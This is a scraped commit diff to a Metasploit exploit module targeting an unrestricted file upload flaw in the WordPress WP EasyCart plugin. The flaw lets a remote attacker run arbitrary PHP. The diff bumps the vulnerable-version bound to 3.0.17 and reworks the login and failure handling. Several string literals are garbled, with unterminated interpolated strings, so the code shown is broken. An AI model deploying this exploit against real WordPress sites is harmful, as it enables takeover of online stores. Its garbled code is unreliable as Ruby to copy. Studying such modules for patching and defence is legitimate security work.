@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
1414 def initialize ( info = { } )
1515 super ( update_info (
1616 info ,
17- 'Name' => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload' ,
17+ 'Name' => 'WordPress WP EasyCart Unrestricted File Upload' ,
1818 'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
1919 WordPress contains a flaw that allows a remote
2020 attacker to execute arbitrary PHP code. This
@@ -49,7 +49,7 @@ def initialize(info = {})
4949 'DisclosureDate' => 'Jan 08 2015' ,
5050 'Platform' => 'php' ,
5151 'Arch' => ARCH_PHP ,
52- 'Targets' => [ [ 'wp-easycart < 3.0.16 ' , { } ] ] ,
52+ 'Targets' => [ [ 'wp-easycart < 3.0.17 ' , { } ] ] ,
5353 'DefaultTarget' => 0
5454 ) )
5555
@@ -95,7 +95,7 @@ def req_id
9595 end
9696
9797 def check
98- check_plugin_version_from_readme ( 'wp-easycart' , '3.0.16 ' )
98+ check_plugin_version_from_readme ( 'wp-easycart' , '3.0.17 ' )
9999 end
100100
101101 def generate_mime_message ( payload , date_hash , name , include_req_id )
@@ -126,13 +126,15 @@ def exploit
126126 print_status ( "#{ peer } #{ username } #{ password } )
127127 cookie = wordpress_login ( username , password )
128128
129- if use_ec_authentication
130- print_warning ( "#{ peer } ) if cookie . nil?
129+ if !cookie
130+ if use_ec_authentication
131+ print_warning ( "#{ peer } )
132+ else
133+ fail_with ( Failure ::NoAccess , 'Failed to authenticate with WordPress' )
134+ end
131135 else
132- fail_with ( Failure :: NoAccess , 'Failed to authenticate with WordPress' ) if cookie . nil?
136+ print_good ( " #{ peer } - Authenticated with WordPress" )
133137 end
134-
135- print_good ( "#{ peer } ) unless cookie . nil?
136138 end
137139
138140 print_status ( "#{ peer } )
0 commit comments